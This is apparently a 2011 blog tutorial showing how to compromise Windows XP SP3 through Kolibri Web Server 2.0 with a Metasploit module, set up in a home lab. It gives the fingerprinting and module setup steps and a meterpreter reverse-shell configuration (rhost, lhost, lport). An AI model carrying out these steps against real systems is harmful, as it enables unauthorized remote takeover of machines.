Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

Bookmark

Type : Tutorial

Level : Easy

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows XP SP3

Tested Vulnerable Application : Kolibri 2.0

Exploit Credit : mr_me, The_Leader

Another zeroday exploit found in Kolibri HTTP Web Server. Actually this exploit was written into metasploit framework module in 2011-08-03, but until now there's no fixation or update from the Kolibri developer.

Requirements :

1. Metasploit Framework

2. Kolibri HTTP Server 2.0(download below)

Download from Mediafire.com

3. Kolibri HTTP exploit(download link)

Mediafire.com

Step By Step :

Attacker IP address : 192.168.8.93

Victim IP address : 192.168.8.94

1. Download the kolibri_http.rb exploit from the link above and for testing purpose I've also included the link to download the vulnerable Kolibri web server 2.0 so you can try in your own lab.

Copy the kolibri_http.rb to following folder(I'm using backtrack 5 R1) :

/pentest/exploit/framework/modules/exploit/windows/http

2. To determine which type of server running, we can do a simple fingerprint by telneting to the remote host and specified port. In this case the victim kolibri HTTP server was run on port 8080, but the usual web server was run on port 80.

telnet    192.168.8.94      8080
               ^             ^
        remote ip address   port

Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

3. The next step let's prepare the exploit to exploiting the vulnerable kolibri web server by choosing the exploit we've already added in step 1. In this exploit I'm using meterpreter payload.

Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

4. Set up the needed switch to perform our exploit. To view all the available switch for this exploit + payload just run show options command.

Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

Information :

set rhost 192.168.8.94 --> determine the target ip address

set rport 8080 --> determine the target port which run kolibri web server

set lhost 192.168.8.93 --> our local ip address to receive reverse connection from victim

set lport 443 --> local port to handle reverse connection from victim

5. When everything we've been set up correctly, now let's try to run the exploit by using exploit command and see it's successful or not.

Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

pWn3D!!

Countermeasures :

1. Until now I'm wrote this tutorial 2011-10-21 Kolibri web server still no update a.k.a the exploit status still zeroday

Hope it's useful 🙂

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found it was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com